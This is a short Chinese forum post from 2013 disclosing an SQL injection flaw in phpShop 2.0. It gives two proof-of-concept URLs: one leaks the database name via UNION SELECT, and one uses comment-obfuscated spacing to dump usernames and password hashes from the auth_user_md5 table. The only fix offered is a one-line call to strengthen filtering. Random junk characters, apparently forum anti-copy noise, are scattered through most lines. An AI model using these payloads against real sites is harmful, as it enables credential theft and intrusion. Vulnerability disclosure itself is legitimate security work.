标题 : phpshop 2.0 SQL Injection Vulnerability
" K! c& k+ j. O6 e4 {7 k' l6 a0 g k
作者 : By onestree
' q# u' \5 T1 A0 I: c2 S下载地址 : http://code.google.com/p/phpshop/downloads/list
7 O( m9 h. r q& a3 M测试地址: windows 7 / ubuntu
( n2 X# l3 u/ D; _, B - A& j4 T: S' O0 J
0 z( n% n) T9 `& u c) t, e) ^0 rSQLi p0c:
- x3 F' @8 F) A
! H! K3 y0 \; Y8 Q4 c0 k==================
4 E4 \, O% M5 G0 a* h. x. L" _
+ ^" @% {# r) R0 B" u# Ihttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
' V2 u+ ^' O# X7 V( z% _union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
4 f3 B5 |4 o$ w) e! P 3 P9 s4 H. m* v* |# N/ @( X
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--0 r! C' u! \5 ?
, U5 I5 n; j* ?" [: n
修复:
4 l3 U8 o% _( k ], F加强过滤
2 l. p' U( q* P9 q# r, Z9 s
7 y t- C" x) o- z$ ~6 c' b8 w o
|
发表于 2013-1-18 18:24:10
收藏
支持
反对